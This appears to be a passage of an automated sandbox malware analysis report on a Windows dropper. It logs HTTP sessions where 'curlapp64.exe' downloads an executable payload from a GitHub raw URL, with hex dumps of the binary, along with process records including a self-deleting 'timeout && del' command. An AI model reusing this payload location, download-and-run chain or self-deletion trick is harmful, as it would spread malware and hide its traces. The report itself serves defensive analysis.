                                                                                                                              2024-12-10 06:35:24 UTC88OUTHEAD /botrunvd01/botdwl/raw/main/botprnt.dat HTTP/1.1
                                                                                                                              Host: github.com
                                                                                                                              Accept: */*
                                                                                                                              2024-12-10 06:35:25 UTC549INHTTP/1.1 302 Found
                                                                                                                              Server: GitHub.com
                                                                                                                              Date: Tue, 10 Dec 2024 06:35:07 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                              Access-Control-Allow-Origin:
                                                                                                                              Location: https://raw.githubusercontent.com/botrunvd01/botdwl/main/botprnt.dat
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                              X-Frame-Options: deny
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              X-XSS-Protection: 0
                                                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                                                              2024-12-10 06:35:25 UTC3379INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 77 65 62 70 61 63 6b 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f
                                                                                                                              Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.co


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              9192.168.2.549759185.199.109.1334431264C:\Users\user\Desktop\curlapp64.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-10 06:35:26 UTC99OUTHEAD /botrunvd01/botdwl/main/botprnt.dat HTTP/1.1
                                                                                                                              Host: raw.githubusercontent.com
                                                                                                                              Accept: */*
                                                                                                                              2024-12-10 06:35:27 UTC902INHTTP/1.1 200 OK
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 17375232
                                                                                                                              Cache-Control: max-age=300
                                                                                                                              Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              ETag: "7cbcbacbd0e618085a41fd0edfbf97987a034ec2cc9fcab6a684b93b3c831467"
                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              X-Frame-Options: deny
                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                              X-GitHub-Request-Id: A214:3389B3:301995:359EEE:6757E11C
                                                                                                                              Accept-Ranges: bytes
                                                                                                                              Date: Tue, 10 Dec 2024 06:35:27 GMT
                                                                                                                              Via: 1.1 varnish
                                                                                                                              X-Served-By: cache-ewr-kewr1740029-EWR
                                                                                                                              X-Cache: HIT
                                                                                                                              X-Cache-Hits: 3
                                                                                                                              X-Timer: S1733812527.010975,VS0,VE0
                                                                                                                              Vary: Authorization,Accept-Encoding,Origin
                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                              Cross-Origin-Resource-Policy: cross-origin
                                                                                                                              X-Fastly-Request-ID: 7281da9af6e34935a720d8dc441d71fb657095ba
                                                                                                                              Expires: Tue, 10 Dec 2024 06:40:27 GMT
                                                                                                                              Source-Age: 18


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              10192.168.2.54976420.233.83.1454431264C:\Users\user\Desktop\curlapp64.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-10 06:35:28 UTC87OUTGET /botrunvd01/botdwl/raw/main/botprnt.dat HTTP/1.1
                                                                                                                              Host: github.com
                                                                                                                              Accept: */*
                                                                                                                              2024-12-10 06:35:29 UTC549INHTTP/1.1 302 Found
                                                                                                                              Server: GitHub.com
                                                                                                                              Date: Tue, 10 Dec 2024 06:35:07 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                              Access-Control-Allow-Origin:
                                                                                                                              Location: https://raw.githubusercontent.com/botrunvd01/botdwl/main/botprnt.dat
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                              X-Frame-Options: deny
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              X-XSS-Protection: 0
                                                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                                                              2024-12-10 06:35:29 UTC3378INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 77 65 62 70 61 63 6b 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f
                                                                                                                              Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.co


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              11192.168.2.549770185.199.109.1334431264C:\Users\user\Desktop\curlapp64.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-10 06:35:30 UTC98OUTGET /botrunvd01/botdwl/main/botprnt.dat HTTP/1.1
                                                                                                                              Host: raw.githubusercontent.com
                                                                                                                              Accept: */*
                                                                                                                              2024-12-10 06:35:31 UTC902INHTTP/1.1 200 OK
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 17375232
                                                                                                                              Cache-Control: max-age=300
                                                                                                                              Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              ETag: "7cbcbacbd0e618085a41fd0edfbf97987a034ec2cc9fcab6a684b93b3c831467"
                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              X-Frame-Options: deny
                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                              X-GitHub-Request-Id: 4DD6:37C0E5:13E06D:1611DA:6757E121
                                                                                                                              Accept-Ranges: bytes
                                                                                                                              Date: Tue, 10 Dec 2024 06:35:30 GMT
                                                                                                                              Via: 1.1 varnish
                                                                                                                              X-Served-By: cache-nyc-kteb1890037-NYC
                                                                                                                              X-Cache: HIT
                                                                                                                              X-Cache-Hits: 0
                                                                                                                              X-Timer: S1733812531.947694,VS0,VE1
                                                                                                                              Vary: Authorization,Accept-Encoding,Origin
                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                              Cross-Origin-Resource-Policy: cross-origin
                                                                                                                              X-Fastly-Request-ID: a5afd60beab1f5d4df9af35c5ad50ec6e86c87b0
                                                                                                                              Expires: Tue, 10 Dec 2024 06:40:30 GMT
                                                                                                                              Source-Age: 12
                                                                                                                              2024-12-10 06:35:31 UTC1378INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 3f f7 f9 e3 7b 96 97 b0 7b 96 97 b0 7b 96 97 b0 09 17 96 b1 7e 96 97 b0 7b 96 96 b0 6a 96 97 b0 f8 10 92 b1 7a 96 97 b0 f8 10 94 b1 7a 96 97 b0 f8 10 97 b1 7a 96 97 b0 f8 10 95 b1 7a 96 97 b0 52 69 63 68 7b 96 97 b0 00 00 00 00 00 00 00 00 50 45 00 00 64 86 04 00 ec 70 55 67 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0e 2a 00 2a 00 00 00 f2 08 01 00 00 00 00 20 24 00 00 00 10 00
                                                                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$?{{{~{jzzzzRich{PEdpUg" ** $
                                                                                                                              2024-12-10 06:35:31 UTC1378INData Raw: 46 fd 88 4e f4 0f b6 4e f5 88 46 f5 0f b6 46 01 88 4e fd 0f b6 4e f9 88 46 f9 0f b6 46 fa 88 4e 01 0f b6 4e f6 88 46 f6 0f b6 46 fe 88 46 fa 0f b6 46 02 88 46 fe 88 4e 02 0f 1f 44 00 00 49 8b c8 ba 04 00 00 00 0f 1f 84 00 00 00 00 00 0f b6 01 48 8d 49 04 42 0f b6 04 18 88 41 fc 48 83 ea 01 75 eb 49 ff c0 49 83 e9 01 75 d2 44 0f b6 c5 48 8b c3 49 c1 e0 04 41 b9 04 00 00 00 4c 2b c3 4c 03 c7 66 66 66 0f 1f 84 00 00 00 00 00 ba 04 00 00 00 66 66 66 0f 1f 84 00 00 00 00 00 41 0f b6 0c 00 30 08 48 ff c0 48 83 ea 01 75 f0 49 83 e9 01 75 da 40 84 ed 74 18 48 8b cb e8 1d 01 00 00 40 80 c5 ff 4c 8d 1d 32 31 00 00 e9 0d ff ff ff b9 10 00 00 00 0f 1f 84 00 00 00 00 00 41 0f b6 04 1f 30 03 48 8d 5b 01 48 83 e9 01 75 ef 0f b6 84 24 80 00 00 00 48 83 c6 10 88 87 b1 00
                                                                                                                              Data Ascii: FNNFFNNFFNNFFFFFNDIHIBAHuIIuDHIAL+LffffffA0HHuIu@tH@L21A0H[Hu$H
                                                                                                                              2024-12-10 06:35:31 UTC1378INData Raw: 0f b6 b4 16 60 42 00 00 49 8d 57 fe 42 0f b6 b4 15 60 42 00 00 42 0f b6 ac 13 60 42 00 00 48 c1 ea 02 42 0f b6 9c 12 60 44 00 00 43 32 9c 11 60 42 00 00 46 8d 04 ad f0 ff ff ff 41 32 1c 08 41 8d 40 01 42 8d 3c ad 00 00 00 00 44 0f b6 cb 88 1c 0f 44 32 34 08 8d 47 01 44 88 34 08 45 0f b6 e6 41 8d 40 02 40 32 34 08 8d 47 02 40 88 34 08 44 0f b6 d6 41 8d 40 03 40 32 2c 08 8d 47 03 40 88 2c 08 44 0f b6 dd 41 8d 45 01 a8 03 75 4a 4c 8d 05 a6 e8 ff ff 40 0f b6 c6 49 8d 57 ff 48 c1 ea 02 46 0f b6 a4 00 60 42 00 00 40 0f b6 c5 46 0f b6 8c 02 60 44 00 00 46 0f b6 94 00 60 42 00 00 0f b6 c3 46 0f b6 9c 00 60 42 00 00 41 0f b6 c6 46 32 8c 00 60 42 00 00 8d 47 04 46 8d 04 ad f4 ff ff ff 45 32 0c 08 44 88 0c 08 41 8d 40 01 44 32 24 08 8d 47 05 44 88 24 08 41 8d 40 02
                                                                                                                              Data Ascii: `BIWB`BB`BHB`DC2`BFA2A@B<DD24GD4EA@@24G@4DA@@2,G@,DAEuJL@IWHF`B@F`DF`BF`BAF2`BGFE2DA@D2$GD$A@
                                                                                                                              2024-12-10 06:35:31 UTC1378INData Raw: 48 89 43 50 49 8b 45 08 48 89 43 58 48 b8 00 00 00 00 00 10 00 00 48 c7 43 68 0a 00 02 00 48 c7 43 70 08 00 00 00 48 89 73 78 48 89 44 24 78 48 8d 44 24 78 48 89 83 98 00 00 00 48 8b 45 78 48 c7 83 88 00 00 00 10 00 02 00 48 c7 83 90 00 00 00 08 00 00 00 48 85 c0 74 1f 48 c7 83 a8 00 00 00 00 00 06 00 48 c7 83 b0 00 00 00 08 00 00 00 48 89 83 b8 00 00 00 eb 04 48 83 03 e0 33 c0 48 89 5c 24 50 0f 57 c0 48 89 45 10 0f 11 45 c0 48 8d 45 c0 48 c7 45 c0 58 00 00 00 48 89 44 24 48 48 8d 54 24 70 48 8b 44 24 60 48 8d 4c 24 68 48 89 44 24 40 41 b9 00 00 00 02 44 89 64 24 38 48 8d 45 88 44 89 64 24 30 45 8b c1 48 89 44 24 28 48 8d 45 88 0f 11 45 d0 48 89 44 24 20 0f 11 45 e0 44 89 65 c8 0f 11 45 f0 c7 45 d0 01 00 00 00 0f 11 45 00 4c 89 64 24 68 4c 89 64 24 70 e8
                                                                                                                              Data Ascii: HCPIEHCXHHChHCpHsxHD$xHD$xHHExHHHtHHHH3H\$PWHEEHEHEXHD$HHT$pHD$`HL$hHD$@ADd$8HEDd$0EHD$(HEEHD$ EDeEEELd$hLd$p
                                                                                                                              2024-12-10 06:35:31 UTC1378INData Raw: 44 24 70 01 00 00 00 c7 44 24 74 51 fd 31 e9 48 89 75 80 c7 45 88 01 00 00 00 c7 45 8c 3f 3e 44 b5 48 89 75 98 c7 45 a0 01 00 00 00 c7 45 a4 92 59 18 40 48 89 75 b0 c7 45 b8 01 00 00 00 c7 45 bc 2e b3 3f 8a 48 89 75 c8 89 75 d0 c7 45 d4 2f 4d 75 13 48 89 75 d8 89 75 e8 c7 45 ec ac da f9 52 48 89 75 f0 89 75 00 c7 45 04 30 fa 79 b7 48 89 75 08 89 75 18 c7 45 1c e9 2e 6f 1c 48 89 75 20 89 75 30 c7 45 34 58 fd e2 09 48 89 75 38 89 75 48 c7 45 4c 7b fa 26 a5 48 89 75 50 4d 85 ff 75 17 be ff ff ff ff 8b c6 48 81 c4 78 04 00 00 41 5f 41 5e 5f 5e 5b 5d c3 49 63 4f 3c 48 8d 85 70 02 00 00 49 03 cf 4c 89 a4 24 70 04 00 00 48 8d 80 80 00 00 00 4c 89 ac 24 68 04 00 00 44 8b f6 8b fe 0f 10 41 18 0f 10 49 28 0f 11 40 80 0f 10 41 38 0f 11 48 90 0f 10 49 48 0f 11 40 a0
                                                                                                                              Data Ascii: D$pD$tQ1HuEE?>DHuEEY@HuEE.?HuuE/MuHuuERHuuE0yHuuE.oHu u0E4XHu8uHEL{&HuPMuHxA_A^_^[]IcO<HpIL$pHL$hDAI(@A8HIH@
                                                                                                                              2024-12-10 06:35:31 UTC1378INData Raw: 05 b1 1a 00 00 e8 2c f7 ff ff f3 0f 7e 0d 94 29 00 00 0f 57 c0 f3 0f 7e 15 91 29 00 00 b9 10 00 00 00 66 0f 60 c8 66 0f 60 d0 f3 0f 7f 4d b0 f3 0f 7f 55 c0 66 90 0f b6 04 19 66 89 44 4d b0 48 ff c1 48 83 f9 14 72 ee 48 8d 1d 77 29 00 00 ba 50 01 00 00 48 8b cb 4c 8d 0d b8 1a 00 00 4c 8d 05 91 1a 00 00 e8 cc f6 ff ff 48 8b cf 66 0f 1f 84 00 00 00 00 00 f3 0f 7e 0c 19 0f 57 c0 66 0f 60 c8 f3 0f 7f 8c 4d 90 00 00 00 f3 0f 7e 4c 19 08 66 0f 60 c8 f3 0f 7f 8c 4d a0 00 00 00 f3 0f 7e 4c 19 10 66 0f 60 c8 f3 0f 7f 8c 4d b0 00 00 00 f3 0f 7e 4c 19 18 66 0f 60 c8 f3 0f 7f 8c 4d c0 00 00 00 48 83 c1 20 48 81 f9 40 01 00 00 72 a5 48 81 f9 4b 01 00 00 73 24 0f 1f 40 00 0f 1f 84 00 00 00 00 00 0f b6 04 19 66 89 84 4d 90 00 00 00 48 ff c1 48 81 f9 4b 01 00 00 72 e8 65
                                                                                                                              Data Ascii: ,~)W~)f`f`MUffDMHHrHw)PHLLHf~Wf`M~Lf`M~Lf`M~Lf`MH H@rHKs$@fMHHKre
                                                                                                                              2024-12-10 06:35:31 UTC1378INData Raw: 45 bc 88 42 0c 0f b6 45 bd 88 42 0d 0f b6 45 be 88 42 0e 0f b6 45 bf 88 42 0f 0f b6 45 c0 88 42 10 0f b6 45 c1 88 42 11 0f b6 45 c2 88 42 12 0f b6 45 c3 88 42 13 0f b6 45 c4 88 42 14 0f b6 45 c5 88 42 15 0f b6 45 c6 88 42 16 0f b6 45 c7 88 42 17 0f b6 45 c8 88 42 18 0f b6 45 c9 88 42 19 0f b6 45 ca 88 42 1a 0f b6 45 cb 88 42 1b 0f b6 45 cc 88 42 1c 0f b6 45 cd 88 42 1d 0f b6 45 ce 88 42 1e 0f b6 45 cf 88 42 1f 0f b6 45 d0 88 42 20 0f b6 45 d1 88 42 21 0f b6 45 d2 88 42 22 0f b6 45 d3 88 42 23 0f b6 45 d4 88 42 24 0f b6 45 d5 88 42 25 0f b6 45 d6 88 42 26 0f b6 45 d7 88 42 27 0f b6 45 d8 88 42 28 0f b6 45 d9 88 42 29 c7 85 80 00 00 00 28 00 08 02 65 48 8b 04 25 30 00 00 00 4d 8b c6 ba 08 00 00 00 48 8b 48 60 48 8b 49 30 ff 15 d3 04 09 01 48 89 45 48 48 85
                                                                                                                              Data Ascii: EBEBEBEBEBEBEBEBEBEBEBEBEBEBEBEBEBEBEBEBEB EB!EB"EB#EB$EB%EB&EB'EB(EB)(eH%0MHH`HI0HEHH
                                                                                                                              2024-12-10 06:35:31 UTC1378INData Raw: d8 06 41 88 40 25 66 0f 7e c0 66 41 0f 6f c0 66 0f 73 d8 07 41 88 40 26 66 0f 7e c0 66 41 0f 6f c0 66 0f 73 d8 08 41 88 40 27 66 0f 7e c0 66 41 0f 6f c0 66 0f 73 d8 09 41 88 40 28 66 0f 7e c0 66 41 0f 6f c0 66 0f 73 d8 0a 41 88 40 29 66 0f 7e c0 66 41 0f 6f c0 66 0f 73 d8 0b 41 88 40 2a 66 0f 7e c0 66 41 0f 6f c0 66 0f 73 d8 0c 41 88 40 2b 66 0f 7e c0 66 41 0f 6f c0 66 0f 73 d8 0d 41 88 40 2c 66 0f 7e c0 66 41 0f 6f c0 66 0f 73 d8 0e 66 41 0f 73 d8 0f 41 88 40 2d 66 0f 7e c0 66 41 0f 6f c1 66 0f 73 d8 01 41 88 40 2e 66 44 0f 7e c0 41 88 40 2f 66 44 0f 7e c8 41 88 40 30 66 0f 7e c0 66 41 0f 6f c1 66 0f 73 d8 02 41 88 40 31 66 0f 7e c0 66 41 0f 6f c1 66 0f 73 d8 03 41 88 40 32 66 0f 7e c0 66 41 0f 6f c1 66 0f 73 d8 04 41 88 40 33 66 0f 7e c0 66 41 0f 6f c1
                                                                                                                              Data Ascii: A@%f~fAofsA@&f~fAofsA@'f~fAofsA@(f~fAofsA@)f~fAofsA@*f~fAofsA@+f~fAofsA@,f~fAofsfAsA@-f~fAofsA@.fD~A@/fD~A@0f~fAofsA@1f~fAofsA@2f~fAofsA@3f~fAo
                                                                                                                              2024-12-10 06:35:31 UTC1378INData Raw: 33 d2 33 c9 ff d0 85 c0 78 0d 48 8b 8d 90 03 00 00 ff 15 19 fb 08 01 48 8d 95 90 03 00 00 48 c7 85 90 03 00 00 80 69 67 ff 33 c9 e8 bc 00 00 00 65 48 8b 04 25 30 00 00 00 33 d2 4c 8b 45 58 48 8b 48 60 48 8b 49 30 ff 15 c3 fa 08 01 48 89 7d 58 33 d2 89 7d 50 65 48 8b 04 25 30 00 00 00 4c 8b 45 78 48 8b 48 60 48 8b 49 30 ff 15 9f fa 08 01 48 81 c4 78 04 00 00 5f 5d c3 cc cc cc cc cc 48 83 ec 08 4c 8b c9 4d 85 c0 74 13 48 89 3c 24 48 8b f9 49 8b c8 0f b6 c2 f3 aa 48 8b 3c 24 49 8b c1 48 83 c4 08 c3 cc cc cc cc cc cc cc cc cc 4c 8b d1 8b 05 37 fa 08 01 0f 05 c3 4c 8b d1 8b 05 2f fa 08 01 0f 05 c3 4c 8b d1 8b 05 27 fa 08 01 0f 05 c3 4c 8b d1 8b 05 1f fa 08 01 0f 05 c3 4c 8b d1 8b 05 17 fa 08 01 0f 05 c3 4c 8b d1 8b 05 0f fa 08 01 0f 05 c3 00 00 00 00 00 00 00
                                                                                                                              Data Ascii: 33xHHHig3eH%03LEXHH`HI0H}X3}PeH%0LExHH`HI0Hx_]HLMtH<$HIH<$IHL7L/L'LLL
                                                                                                                              2024-12-10 06:35:31 UTC1378INData Raw: c9 7d fa 59 47 f0 ad d4 a2 af 9c a4 72 c0 b7 fd 93 26 36 3f f7 cc 34 a5 e5 f1 71 d8 31 15 04 c7 23 c3 18 96 05 9a 07 12 80 e2 eb 27 b2 75 09 83 2c 1a 1b 6e 5a a0 52 3b d6 b3 29 e3 2f 84 53 d1 00 ed 20 fc b1 5b 6a cb be 39 4a 4c 58 cf d0 ef aa fb 43 4d 33 85 45 f9 02 7f 50 3c 9f a8 51 a3 40 8f 92 9d 38 f5 bc b6 da 21 10 ff f3 d2 cd 0c 13 ec 5f 97 44 17 c4 a7 7e 3d 64 5d 19 73 60 81 4f dc 22 2a 90 88 46 ee b8 14 de 5e 0b db e0 32 3a 0a 49 06 24 5c c2 d3 ac 62 91 95 e4 79 e7 c8 37 6d 8d d5 4e a9 6c 56 f4 ea 65 7a ae 08 ba 78 25 2e 1c a6 b4 c6 e8 dd 74 1f 4b bd 8b 8a 70 3e b5 66 48 03 f6 0e 61 35 57 b9 86 c1 1d 9e e1 f8 98 11 69 d9 8e 94 9b 1e 87 e9 ce 55 28 df 8c a1 89 0d bf e6 42 68 41 99 2d 0f b0 54 bb 16 52 09 6a d5 30 36 a5 38 bf 40 a3 9e 81 f3 d7 fb 7c
                                                                                                                              Data Ascii: }YGr&6?4q1#'u,nZR;)/S [j9JLXCM3EP<Q@8!_D~=d]s`O"*F^2:I$\by7mNlVezx%.tKp>fHa5WiU(BhA-TRj068@|


                                                                                                                              Statistics

                                                                                                                              CPU Usage

                                                                                                                              Click to jump to process

                                                                                                                              Memory Usage

                                                                                                                              Click to jump to process

                                                                                                                              High Level Behavior Distribution

                                                                                                                              Click to dive into process behavior distribution

                                                                                                                              Behavior

                                                                                                                              Click to jump to process

                                                                                                                              System Behavior

                                                                                                                              General

                                                                                                                              Target ID:0
                                                                                                                              Start time:01:34:54
                                                                                                                              Start date:10/12/2024
                                                                                                                              Path:C:\Users\user\Desktop\dYUteuvmHn.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:"C:\Users\user\Desktop\dYUteuvmHn.exe"
                                                                                                                              Imagebase:0x7ff712760000
                                                                                                                              File size:1'694'720 bytes
                                                                                                                              MD5 hash:F5BD4BBC494017262A22785E5B53F316
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:low
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:1
                                                                                                                              Start time:01:34:55
                                                                                                                              Start date:10/12/2024
                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:cmd.exe /c start "" "C:\Users\user\Desktop\curlapp64.exe"
                                                                                                                              Imagebase:0x7ff659870000
                                                                                                                              File size:289'792 bytes
                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:2
                                                                                                                              Start time:01:34:55
                                                                                                                              Start date:10/12/2024
                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:cmd.exe /c timeout /t 10 /nobreak && del /q "C:\Users\user\Desktop\dYUteuvmHn.exe"
                                                                                                                              Imagebase:0x7ff659870000
                                                                                                                              File size:289'792 bytes
                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:3
                                                                                                                              Start time:01:34:55
                                                                                                                              Start date:10/12/2024
                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                              Imagebase:0x7ff6d64d0000
                                                                                                                              File size:862'208 bytes
                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:4
                                                                                                                              Start time:01:34:55
                                                                                                                              Start date:10/12/2024
                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                              Imagebase:0x7ff6d64d0000
                                                                                                                              File size:862'208 bytes
                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:5
                                                                                                                              Start time:01:34:55
                                                                                                                              Start date:10/12/2024
                                                                                                                              Path:C:\Users\user\Desktop\curlapp64.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:"C:\Users\user\Desktop\curlapp64.exe"
                                                                                                                              Imagebase:0x7ff6cabb0000
                                                                                                                              File size:614'912 bytes
                                                                                                                              MD5 hash:990DCC08D59B375A75DD575701DD2AA4
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Antivirus matches:
                                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                                              • Detection: 45%, ReversingLabs
                                                                                                                              Reputation:low
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:6
                                                                                                                              Start time:01:34:55
                                                                                                                              Start date:10/12/2024
                                                                                                                              Path:C:\Windows\System32\timeout.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:timeout /t 10 /nobreak
                                                                                                                              Imagebase:0x7ff7bf9e0000
                                                                                                                              File size:32'768 bytes
                                                                                                                              MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:moderate
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:8
                                                                                                                              Start time:01:35:07
                                                                                                                              Start date:10/12/2024
                                                                                                                              Path:C:\Users\user\Desktop\curlapp64.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:"C:\Users\user\Desktop\curlapp64.exe"
                                                                                                                              Imagebase:0x7ff6cabb0000
                                                                                                                              File size:614'912 bytes
                                                                                                                              MD5 hash:990DCC08D59B375A75DD575701DD2AA4
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:low
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:11
                                                                                                                              Start time:01:35:15
                                                                                                                              Start date:10/12/2024
                                                                                                                              Path:C:\Users\user\Desktop\curlapp64.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:"C:\Users\user\Desktop\curlapp64.exe"
                                                                                                                              Imagebase:0x7ff6cabb0000
                                                                                                                              File size:614'912 bytes
                                                                                                                              MD5 hash:990DCC08D59B375A75DD575701DD2AA4
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:low
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:15
                                                                                                                              Start time:01:35:39
